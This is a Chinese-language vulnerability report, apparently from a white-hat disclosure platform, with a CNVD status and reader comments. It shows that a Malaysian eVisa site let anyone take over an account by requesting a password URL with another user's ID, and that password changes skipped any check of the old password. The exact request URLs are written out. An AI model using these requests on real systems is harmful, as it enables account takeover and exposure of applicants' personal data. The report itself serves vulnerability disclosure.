马来西亚电子签证网站奇葩漏洞可泄漏所有用户资料及修改任意用户密码

注册了一个账户后试了下修改密码：

抓包发现更新密码时会请求：

https://www.windowmalaysia.my/evisa/password?userId=用户ID&oldPassword=12345678&newPassword=87654321&cPassword=87654321&_=1456808130204

于是把自己的ID换成了别的重放了一遍，再次查看个人信息页面（https://www.windowmalaysia.my/evisa/vlno_profile.jsp），结果看到了别的ID对应的资料（此时该用户密码并没有被改）：

然后测试了下发现其实只要先访问（不登录也可以）

https://www.windowmalaysia.my/evisa/password?userId=目标ID

再访问

https://www.windowmalaysia.my/evisa/vlno_profile.jsp

就自动登录进了对应ID的账户。

接着修改密码的部分居然没有验证原密码是否正确:

所以原密码随便填都可以改掉密码了…

貌似网站刚刚改版完，那么再改一下吧…

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-03-04 10:37

厂商回复：

CNVD未直接复现所述情况，暂未建立与网站管理单位的直接处置渠道，待认领。

最新状态：

暂无

1. 2016-03-01 21:20 | 艺术家 ( 普通白帽子 | Rank:552 漏洞数:109 | 我觉得我像个艺术家。)

   1

   马来西亚现在是我们的友盟国，你这样做，不怕查水表嘛？

   1# 回复此人

2. 2016-03-04 10:56 | 宝宝 ( 普通白帽子 | Rank:127 漏洞数:34 | 我是好宝宝)

   1

   @艺术家 M370很多受害者的赔偿还没给呢，还盟国....楼主你去过沙巴吗？那的海盗看到中国人就打劫

   2# 回复此人

3. 2016-03-04 11:54 | 0x0d ( 实习白帽子 | Rank:74 漏洞数:11 | >_<'//)

   1

   @宝宝 没有…估计是去不成了

   3# 回复此人

4. 2016-03-04 13:39 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

   1

   亲， 貌似你需要用英语写标题~

   4# 回复此人

5. 2016-03-04 19:38 | 0x0d ( 实习白帽子 | Rank:74 漏洞数:11 | >_<'//)

   1

   @’‘Nome So why don't you submit vulnerability on the en.wooyun.org?

   5# 回复此人

6. 2016-03-04 19:42 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件，，垃圾邮...)

   1

   @0x0d NO

   6# 回复此人